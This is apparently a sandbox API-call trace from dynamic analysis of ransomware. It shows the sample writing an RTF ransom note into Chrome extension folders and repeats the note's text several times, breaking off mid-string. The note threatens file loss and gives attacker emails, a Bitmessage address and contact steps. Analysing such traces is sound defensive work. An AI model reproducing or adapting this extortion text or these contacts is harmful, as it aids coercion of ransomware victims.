your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.319] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.320] CloseHandle (hObject=0x294) returned 1 [0285.320] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0285.320] GetLastError () returned 0x2 [0285.320] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 